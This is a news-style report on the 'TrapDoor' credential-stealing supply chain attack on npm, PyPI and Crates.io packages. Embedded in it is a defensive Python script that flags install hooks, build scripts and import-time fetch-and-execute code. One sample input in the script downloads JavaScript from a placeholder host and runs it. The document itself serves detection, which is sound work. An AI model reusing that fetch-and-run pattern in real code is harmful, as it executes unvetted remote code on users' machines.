Supply Chain Attack Compromises Dozens of Open-Source Packages Across Major Ecosystems
A large-scale supply chain attack has been launched against npm, PyPI, and Crates.io, compromising at least 34 open-source packages and hundreds of associated versions.
The campaign, dubbed 'TrapDoor', is a crypto-focused credential stealer designed to infiltrate developer environments and exfiltrate sensitive data. Researchers have identified over 384 malicious versions distributed across the three ecosystems.
The hackers use ecosystem-specific techniques to execute malicious code during normal development workflows:
- npm packages trigger payload execution via post-install scripts
- PyPI packages execute remote JavaScript during import
- Crates.io packages abuse Rust’s build.rs to run malicious code at compile time
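As an added example (not code from the article or from the researchers behind the report), a pre-install audit in Python that flags the three execution vectors listed above: npm lifecycle hooks in package.json, import-time fetch-and-execute patterns in a Python module, and Cargo build scripts. The sample inputs and the Python-module heuristic are constructed for this example and are not TrapDoor signatures.

```python
import json
import re

# Script names npm runs automatically during `npm install`.
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Constructed heuristic: a module that both reaches the network and runs
# something dynamically at import time (a fetch-and-run pattern).
PY_NETWORK = re.compile(r"\b(?:urllib\.request|requests\.(?:get|post)|http\.client)\b")
PY_DYNAMIC_EXEC = re.compile(r"\b(?:exec\(|eval\(|subprocess\.(?:run|Popen|call)\b|os\.system\()")
# Simplified manifest check: Cargo's [package] build key can point at a custom
# build script or disable auto-detection with `build = false`.
CARGO_BUILD_KEY = re.compile(r'^\s*build\s*=\s*(false|"([^"]*)")', re.MULTILINE)


def audit_npm(package_json: str) -> list:
    """Flag lifecycle hooks that execute shell commands at install time."""
    scripts = json.loads(package_json).get("scripts", {})
    return [f"npm hook {name!r} runs: {cmd}"
            for name, cmd in scripts.items() if name in NPM_LIFECYCLE_HOOKS]


def audit_pypi(module_source: str) -> list:
    """Flag a module that fetches remote content and executes it on import."""
    if PY_NETWORK.search(module_source) and PY_DYNAMIC_EXEC.search(module_source):
        return ["python module fetches and executes content at import time"]
    return []


def audit_crate(cargo_toml: str, crate_files: set) -> list:
    """Flag build scripts: Cargo compiles and runs them before the crate itself."""
    match = CARGO_BUILD_KEY.search(cargo_toml)
    if match and match.group(1) == "false":
        return []  # auto-detection explicitly disabled
    if match:
        return [f"crate declares build script {match.group(2)!r}"]
    if "build.rs" in crate_files:
        return ["crate ships build.rs (auto-detected build script)"]
    return []


# Constructed sample inputs (not taken from any real package).
SAMPLE_PACKAGE_JSON = ('{"name": "demo", "version": "1.0.0", '
                       '"scripts": {"postinstall": "node setup.js", "test": "jest"}}')
SAMPLE_INIT_PY = ("import urllib.request, subprocess\n"
                  "code = urllib.request.urlopen('http://example.invalid/a.js').read()\n"
                  "subprocess.run(['node', '-e', code])\n")
SAMPLE_CARGO_TOML = '[package]\nname = "demo"\nversion = "0.1.0"\n'

if __name__ == "__main__":
    for finding in (audit_npm(SAMPLE_PACKAGE_JSON) + audit_pypi(SAMPLE_INIT_PY)
                    + audit_crate(SAMPLE_CARGO_TOML, {"Cargo.toml", "build.rs", "src/lib.rs"})):
        print("FLAG:", finding)
```

Run it against an unpacked package directory before installation; a flag is a prompt to read the hook or build script, not proof of compromise.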
The shared payload, 'trap-core.js', scans infected systems for sensitive data, validates stolen credentials, and establishes persistence mechanisms.
The data the malware collects from infected systems includes:
- SSH keys and developer credentials
- AWS access keys and GitHub tokens
- Crypto wallet data (Solana, Sui, Aptos)
- Browser-stored login data and session information
- Environment variables and API keys